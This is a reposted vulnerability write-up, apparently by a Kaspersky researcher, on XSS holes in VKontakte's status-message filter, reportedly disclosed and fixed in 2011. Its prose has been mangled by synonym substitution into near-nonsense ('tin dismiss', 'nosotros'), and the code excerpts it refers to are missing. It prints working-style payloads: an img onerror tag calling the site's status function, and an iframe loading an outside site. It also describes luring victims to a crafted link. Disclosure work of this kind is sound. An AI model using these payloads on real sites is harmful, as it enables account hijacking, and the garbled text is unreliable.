A brusk piece ago, I decided to gear upward a presentation on spider web vulnerabilities as well as specifically on XSS attacks. This involved studying the agency today’s filtration systems work.
I selected the nigh pop Russian social networking website, VKontakte.ru, equally a attempt bed. One affair that grabbed my attending was the updated user condition system.
The HTML code inwards the part of the page where users edit their condition messages is shown below:
As yous tin dismiss see, filtering is performed past times the infoCheck() function. The condition itself is located inwards this string:
What nosotros select hither is two-step filtration. The start pace is performed when the user enters the condition message. The 2d pace involves converting the condition message to text as well as returning it to the page inwards the shape inwards which other users volition encounter it.
While the 2d pace definitely industrial plant good as well as it would clearly endure impossible to convert to active XSS, things are non equally elementary where the start pace is concerned, as well as thence it is that pace that nosotros volition hold off at inwards greater detail.
Predictably, the elementary <script>alert()</script> did non work, as well as the condition remained empty. Other ‘script-like’ attempts didn’t work, either – it seems that this exceptional string is explicitly filtered.
However, the <script> tag is non essential for a script to endure executed. The start vulnerability is introduced on the user’s automobile past times using the <img> tag: past times entering the string <img src=1.gif onerror=some_function> equally the user’s status, nosotros tin dismiss larn that business office to endure executed. For example, nosotros tin dismiss telephone band the business office profile.infoSave(), which is called amongst an empty parameter to clear the status, only usage a parameter of our choice. Thus, if nosotros larn inwards <img src=1.gif onerror=profile.infoSave('XSS')>, nosotros larn the string “XSS” equally our condition message:
Another interesting vulnerability associated amongst the filter is that the tag <A> is non filtered. If nosotros larn inwards <A HREF="//www.google.com/">XSS</A> equally our status, nosotros get… a hyperlink clicking on which brings upward a condition editing window and, a 2d later, opens google.com.
As nosotros all remember, XSS = cross site scripting, as well as thence I decided to attempt the side past times side vulnerability using a third-party website amongst a script loaded on it. In add-on to the tags mentioned inwards a higher house non existence filtered, the <iframe> tag too successfully passed the filter. As a result, entering <iframe src="yoursite.com" width="100%" height="300"> inwards the condition draw of piece of occupation volition attain an iframe which volition launch the above-mentioned script loaded on the page. Below is an instance of what the iframe tin dismiss hold off like:
This is a to a greater extent than serious vulnerability than the other two. One agency of exploiting it is past times creating a URL to alter user condition as well as sending it to the victim user inwards the promise that the user volition click on it. The script volition endure executed on the user’s page fifty-fifty earlier the condition message is published. This is a classic instance of passive XSS.
These vulnerabilities existed from 01 August, 2010 – the fourth dimension when the novel user condition organisation was introduced. We notified VKontakte’s direction on 01 March, 2011 as well as the vulnerabilities were shut on 03 March.
News Source : Alexander Antukh
Kaspersky Lab Expert
Share This :
comment 0 Comments
more_vert